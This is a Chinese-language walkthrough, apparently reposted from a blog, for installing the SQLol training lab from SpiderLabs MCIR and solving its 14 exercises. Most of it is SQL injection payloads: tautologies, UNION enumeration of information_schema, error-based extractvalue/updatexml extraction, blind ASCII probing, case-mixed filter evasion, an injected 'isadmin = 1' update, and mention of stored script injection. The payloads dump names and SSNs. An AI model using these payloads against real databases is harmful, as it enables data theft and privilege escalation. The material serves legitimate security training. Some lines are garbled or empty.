SQLol安装
实验器材:Window 7 windows 2008
下载地址:http://github.com/SpiderLabs/MCIR
安装流程:
Window2008配置:
解压压缩包到网站根路径(比方,我新建一个sql目次,存放压缩包内容)
解压MCIR压缩包到c盘/xampp/htdocs/sql
打开c盘/xampp/htdocs/sql/sqlol/includes
/database.config.php 修改 u s e r n a m e / username/ username/password等信息;
右击用vim编辑器打开编辑:
修改 u s e r n a m e / username/ username/password等信息;
打开http://localhost/sql/,可以看到如下界面,点击RESET,即可完成数据库的安装。
出现Done搭建乐成:
返回如图使用:
选择输出效果:所有效果和没有错误信息
出现14个训练题:
0.训练:
’ or ‘1’=‘1
1.训练:
查找数据库
’ and 1=2 union select
concat_ws(char(32,58,32),user(),database(),
version()) #
查找表
’ and 1=2 union all select
TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=‘sqlol’; #
查找列
’ and 1=2 union select
COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME=‘ssn’;#
显示所有字段
’ and 1=2 union select
concat_ws(char(32,58,32),name , ssn ) from ssn #
2.训练:
显示所有字段
1 and 1=2 union
select concat_ws(char(32,58,32),name , ssn) from ssn; #
3.训练
查找数据库
’ and 1=2 union select
concat_ws(char(32,58,32),user(),database(),version()) #
查找表
’ and 1=2 union all select
TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=‘sqlol’ LIMIT 1
OFFSET 1; #
查找列
’ and 1=2 union select
COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME=‘ssn’; #
显示所有字段
’ and 1=2 union select
concat_ws(char(32,58,32),name , ssn ) from ssn LIMIT 1 OFFSET 1 #
4.训练
查找数据库
’ and (extractvalue(1,
concat(0x7e,(select concat_ws(char(32,58,32),user(),database()))))) and ‘1’=‘1
给堕落误信息分析:
显示所有字段
’ and (extractvalue(1, concat(0x7e,(select
concat_ws(char(32,58,32),name , ssn ) from ssn LIMIT 1 OFFSET 1)))) and ‘1’=‘1 #
5.盲注训练
’ or ascii(substring((select
user()),1,1)) = 111#
(1)无反馈:
(2)从111试到了114出来了效果:(111-114是对应ASSIC表中
小写字母o-r)
’ or ascii(substring((select
user()),1,1)) = 114#
6-7.训练:
’ or
updatexml(0,concat(0x01,(SELECT concat(name,’ ‘,ssn) FROM ssn limit 0,1)),0) #
.训练:
’ uNion seLect
concat(name,’:’,ssn) from ssn uNion selEct null from users whEre
username=’
9.训练
admin’, isadmin = 1 WHERE id = 3#
10.训练
concat(name,’:’,ssn) from ssn#
11.训练
12.训练:
1’ and #>
脚本已注入数据库,每次都会弹窗。
13.训练
chuNk mACRUnFast%
通过编写脚本或使用 SQLMAP 举行猜测盘算,当猜测正确的时候返回
值是“Got results!”(因为 Python编程与 SQLMAP)
改了显示信息栏显示的效果:
来源:https://blog.csdn.net/weixin_51167520/article/details/111991991
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作! |